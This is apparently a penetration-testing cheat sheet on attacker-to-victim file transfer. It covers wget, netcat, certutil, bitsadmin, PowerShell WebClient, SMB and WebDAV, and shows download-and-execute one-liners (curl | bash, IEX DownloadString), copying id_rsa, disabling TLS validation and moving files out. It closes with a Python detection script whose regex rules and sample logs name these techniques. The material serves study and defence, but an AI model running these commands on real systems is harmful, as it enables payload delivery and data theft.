File Transfer

Linux to Linux

Description

Two of the most common utilities in Linux distributions to interact with web applications are `wget` and `curl`. These tools are installed on many Linux distributions.

Step 1 - Machine 1
python3 -m http.server 8000
Step 2.1 - Machine 2 Wget
wget http://{IP}:8000/LinEnum.sh -O /tmp/LinEnum.sh
Step 2.2 - Machine 2 cURL
curl http://{IP}:8000/LinEnum.sh -o /tmp/LinEnum.sh

Description

Netcat (often abbreviated to nc) is a computer networking utility for reading from and writing to network connections using TCP or UDP. It was released in 1995 and hasn't been maintained despite its popularity. In this example, we'll transfer `LinEnum.sh` from our attacker machine to the victim machine.

Step 1 - Machine 1
nc -l -p 8000 > LinEnum.sh
Step 2 - Machine 2

We will connect to the victim machine on port 8000 using netcat and send the LinEnum.sh file as input to netcat. The `-q 0` option tells netcat to close the connection once it reaches end of file on stdin. That way, we'll know when the file transfer is complete.

nc -q 0 {IP} 8000 < LinEnum.sh

Description

The computer networking utility tool Netcat (often abbreviated to nc) was released in 1995 and hasn't been maintained despite its popularity. The flexibility and usefulness of this tool prompted the Nmap Project to produce Ncat, a modern reimplementation that supports SSL, IPv6, SOCKS and HTTP proxies, connection brokering, and more.

In this example, we'll transfer `LinEnum.sh` from our attacker machine to the victim machine.

Step 1 - Machine 1

The `--recv-only` flag is used to close the connection once the file transfer is finished.

ncat -l -p 8000 --recv-only > LinEnum.sh
Step 2 - Machine 2

The `--send-only` flag is used to cause Ncat to quit when its input runs out.

ncat --send-only {IP} 8000 < LinEnum.sh

Description

SSH comes with an SCP utility for remote file transfer. We can set up an SSH server on our attacker machine and use the SCP utility to transfer files.

Step 1 - Machine 1
sudo systemctl enable ssh
Step 2 - Machine 1
sudo systemctl start ssh
Step 3 - Machine 2
scp {USER}@{IP}:{FILE_TO_TRANSFER} {FILE_DESTINATION}
Example
scp Administrator@10.10.138.42:/Users/Administrator/20220623131857_loot.zip .

Description

Base64 encoding and decoding is only practical for small files, but it is stealthy because it doesn't require network communication. We can encode a file with base64, copy the resulting string to our victim machine, and decode the base64 there to get our file back.

Step 1 - Machine 1
cat id_rsa | base64 -w 0; echo
Step 2 - Machine 2
echo -n 'LS0tLS1CRU...' | base64 -d

Description

Because of the way Linux works and how pipes operate, most of the tools we use in Linux can be used to replicate fileless operations, which means that we don't have to download a file to execute it.

Step 1 - Machine 1
python3 -m http.server 8000
Step 2.1 - Machine 2 Bash
curl http://{IP}:8000/LinEnum.sh | bash
Step 2.2 - Machine 2 Python
curl http://{IP}:8000/helloworld.py | python3

Description

We can use a simple PHP webserver to transfer files.

Step 1 - Machine 1
php -S 0.0.0.0:8000
Step 2 - Machine 2
wget http://{IP}:8000/{FILE}

Description

We can use a simple Python 2 webserver to transfer files.

Step 1 - Machine 1
python2.7 -m SimpleHTTPServer
Step 2 - Machine 2
wget http://{IP}:8000/{FILE}

Description

We can use a simple Python 3 webserver to transfer files.

Step 1 - Machine 1
python3 -m http.server 8000
Step 2 - Machine 2
wget http://{IP}:8000/{FILE}

Description

We can use a simple Ruby webserver to transfer files.

Step 1 - Machine 1
ruby -run -ehttpd . -p8000
Step 2 - Machine 2
wget http://{IP}:8000/{FILE}

Linux to Windows

Description

bitsadmin.exe is a Windows command-line tool for managing Background Intelligent Transfer Service (BITS) jobs, which can also be used to download a file from a web server.

Step 1 - Linux
python3 -m http.server 8000
Step 2 - Windows
bitsadmin.exe /transfer /Download /priority Foreground http://{IP}:8000/shell.exe c:\Users\thm\Desktop\shell.exe

Description

certutil.exe is a Windows binary for handling certificates; its `-urlcache` option can also be used to fetch a file from a URL.

Step 1 - Linux
python3 -m http.server 8000
Step 2 - Windows
certutil.exe -urlcache -split -f http://{IP}:8000/sharphound.exe sharphound.exe

Description

We can set up an FTP server using `pyftpdlib` on our attacker machine to transfer files.

Step 1 - Linux
sudo pip3 install pyftpdlib
Step 2 - Linux

By default, `pyftpdlib` uses port 2121. We can specify port 21 if preferred.

sudo python3 -m pyftpdlib --port 21
Step 3 - Windows
(New-Object Net.WebClient).DownloadFile('ftp://{IP}/file.txt', 'ftp-file.txt')

Description

PowerShell offers many file transfer options. The following methods from the System.Net.WebClient class can be used to download a file over HTTP, HTTPS, or FTP.

  • OpenRead
  • OpenReadAsync
  • DownloadData
  • DownloadDataAsync
  • DownloadFile
  • DownloadFileAsync
  • DownloadString
  • DownloadStringAsync
Step 1 - Linux
python3 -m http.server 8000
Step 2 - Windows
(New-Object Net.WebClient).DownloadFile('<Target File URL>','<Output File Name>')

Description

From PowerShell 3.0 onwards, the Invoke-WebRequest cmdlet is also available, but is noticeably slower at downloading files. You can use the aliases `iwr`, `curl`, and `wget` instead of the `Invoke-WebRequest` full name.

Step 1 - Linux
python3 -m http.server 8000
Step 2.1 - Windows
Invoke-WebRequest -Uri 'http://{IP}:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'
Step 2.2 - Windows
wget 'http://{IP}:8000/shell.exe'
Step 2.3 - Windows
curl 'http://{IP}:8000/shell.exe' -o shell.exe
Step 2.4 - Windows
iwr -Uri 'http://{IP}:8000/shell.exe' -OutFile 'C:\Windows\Temp\shell.exe'

Description

We can encode a file to a base64 string, copy its contents from the terminal and perform the reverse operation, decoding the string back into the original file. This method is not always possible to use: cmd.exe has a maximum string length of 8191 characters, and a web shell may error if you attempt to send extremely large strings.

Step 1 - Linux
cat id_rsa | base64 -w 0; echo
Step 2 - Windows
[IO.File]::WriteAllBytes("C:\Users\Public\id_rsa", [Convert]::FromBase64String("LS0tLS1..."))

Description

Fileless attacks work by using operating system functions to download the payload and execute it directly. Instead of downloading a PowerShell script to disk, we can run it directly in memory using the Invoke-Expression cmdlet or its alias IEX.

Step 1 - Linux
python3 -m http.server 8000
Step 2 - Windows
iex(New-Object Net.WebClient).DownloadString('http://{IP}:8000/shell.exe')

Description

We can use impacket's `smbserver.py` script to create an SMB server on our attacker machine.

Step 1 - Linux
smbserver.py kali .
Step 2 - Windows
copy \\{attackerIP}\kali\{file} .

Description

New versions of Windows block unauthenticated guest access. You will receive the following error when trying to copy files from an SMB share in an unauthenticated manner: `You can't access this shared folder because your organization's security policies block unauthenticated guest access. These policies help protect your PC from unsafe or malicious devices on the network.`

To transfer files in this scenario, we can set a username and password using our Impacket SMB server and mount the SMB server on our Windows target machine.

Step 1 - Linux
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
Step 2 - Windows
net use n: \\192.168.220.133\share /user:test test
Step 3 - Windows
copy n:\nc.exe

Description

You can mount your drive to the VM over RDP and access it from `This PC`.

Step 1 - Linux
xfreerdp /u:thm /p:Password /v:10.10.123.123 /workspace /home-drive

Description

When trying to download a file, you may come across the following error: `The response content cannot be parsed because the Internet Explorer engine is not available, or Internet Explorer's first-launch configuration is not complete. Specify the UseBasicParsing parameter and try again.`

This error occurs when Internet Explorer's first-launch configuration has not been completed on the target, because Invoke-WebRequest uses the Internet Explorer engine to parse the response by default, which prevents the download.

This error can be avoided with the `-UseBasicParsing` flag, which skips the Internet Explorer engine.

Step 1 - Linux
python3 -m http.server 8000
Step 2 - Windows
Invoke-WebRequest https://{IP}/shell.exe -UseBasicParsing | IEX

Description

When downloading a file, you may come across this error: `Exception calling "DownloadString" with "1" argument(s): "The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel."`

This error occurs because the server's certificate is not trusted by the Windows host. The following command disables certificate validation for the PowerShell session, which is what makes the download succeed:

Step 1 - Linux
python3 -m http.server 8000
Step 2 - Windows
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')

Windows to Linux

Description

We can use PowerShell or the FTP client to upload files to an FTP server.

Step 1 - Linux

Using the Python module `pyftpdlib`, we need to specify the option `--write` to allow clients to upload files to our attacker machine.

sudo python3 -m pyftpdlib --port 21 --write
Step 2 - Windows
(New-Object Net.WebClient).UploadFile('ftp://{IP}/ftp-hosts', 'C:\Windows\System32\drivers\etc\hosts')

Description

We can use base64 to encode a file and copy the base64 to our attacker machine to decode it.

Step 1 - Windows
[Convert]::ToBase64String((Get-Content -path "C:\Windows\system32\drivers\etc\hosts" -Encoding byte))
Step 2 - Linux
echo IyBDb3B5cm... | base64 -d

Description

We can use impacket's `smbserver.py` script to create an SMB server on our attacker machine and upload files to it.

Step 1 - Linux
smbserver.py -smb2support test $(pwd)
Step 2 - Windows
copy {FILE_TO_COPY} \\{ATTACKER_IP}\test

Description

Companies usually allow outbound traffic using the HTTP (TCP/80) and HTTPS (TCP/443) protocols. Enterprises commonly don't allow the SMB protocol (TCP/445) out of their internal network, because this can open them up to potential attacks.

An alternative is to run SMB over HTTP with WebDAV. WebDAV is an extension of HTTP that enables a webserver to behave like a fileserver, supporting collaborative content authoring. WebDAV can also use HTTPS.

When Windows accesses a UNC path, it will first attempt to connect using the SMB protocol, and if there's no SMB share available, it will try to connect using HTTP (WebDAV).

Step 1 - Linux

To setup our WebDAV server, we need to install two Python modules, `wsgidav` and `cheroot`.

sudo pip install wsgidav cheroot
Step 2 - Linux
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
Step 3 - Windows

Connect to the WebDAV share by listing it through the `DavWWWRoot` keyword, which tells Windows to use the WebDAV client.

dir \\192.168.49.129\DavWWWRoot
Step 4 - Windows
copy C:\Users\john\Desktop\SourceCode.zip \\192.168.49.129\DavWWWRoot\
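Every transfer method on this page leaves a command line behind on the endpoint (bash history, auditd EXECVE records, Sysmon Event ID 1, PowerShell script-block logs). The following Python script is an added detection example, not part of the original cheat sheet: it flags the download, decode-to-disk and download-and-execute patterns described above over a constructed sample of such command lines; the rule names and sample lines are assumptions for illustration.

```python
import re

# Each rule: (name, compiled regex). Patterns follow the techniques on this
# page (curl | bash, netcat listeners, certutil, bitsadmin, WebClient, IEX,
# disabled TLS validation, base64 decoding, UNC copies). Extend for your telemetry.
RULES = [
    ("curl_or_wget_piped_to_shell", re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b")),
    ("curl_piped_to_python", re.compile(r"\bcurl\b.*\|\s*python[23]?\b")),
    ("netcat_listener_to_file", re.compile(r"\b(nc|ncat|netcat)\b.*\s-l\b.*>")),
    ("certutil_urlcache_download", re.compile(r"certutil(\.exe)?\b.*-urlcache", re.I)),
    ("bitsadmin_transfer", re.compile(r"bitsadmin(\.exe)?\b.*/transfer", re.I)),
    ("webclient_download", re.compile(r"Net\.WebClient\).*\.Download(File|String|Data)", re.I)),
    ("download_into_iex", re.compile(
        r"\b(iex|Invoke-Expression)\b.*Download(String|Data)|Invoke-WebRequest.*\|\s*iex\b", re.I)),
    ("tls_validation_disabled", re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I)),
    ("base64_decoded_to_file", re.compile(r"FromBase64String|base64\s+(-d|--decode)", re.I)),
    ("unc_copy_to_ip", re.compile(r"\b(copy|net use)\b.*\\\\\d{1,3}(\.\d{1,3}){3}\\", re.I)),
]


def scan_command(cmd: str) -> list[str]:
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan_log(lines) -> list[tuple[str, list[str]]]:
    """Scan an iterable of command lines; keep only those that triggered a rule."""
    hits = []
    for line in lines:
        names = scan_command(line)
        if names:
            hits.append((line.strip(), names))
    return hits


# Constructed sample telemetry mixing benign activity with the page's techniques.
SAMPLE_LOG = [
    "ls -la /var/www",
    "curl http://10.0.0.5:8000/LinEnum.sh | bash",
    "nc -l -p 8000 > LinEnum.sh",
    "curl -s https://example.com/api | jq .",
    "certutil.exe -urlcache -split -f http://10.0.0.5:8000/sharphound.exe sharphound.exe",
    "bitsadmin.exe /transfer /Download /priority Foreground http://10.0.0.5:8000/shell.exe c:\\Users\\thm\\Desktop\\shell.exe",
    "iex(New-Object Net.WebClient).DownloadString('http://10.0.0.5:8000/script.ps1')",
    "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}",
    "net use n: \\\\10.0.0.5\\share /user:test test",
    "Get-ChildItem C:\\Users",
]

if __name__ == "__main__":
    for line, names in scan_log(SAMPLE_LOG):
        print(f"{', '.join(names):45} {line}")
```

Command-line matching is a first triage layer only; pair it with network telemetry (new inbound connections to port 8000, SMB/WebDAV to non-server hosts) to catch the same transfers when the command line is obfuscated.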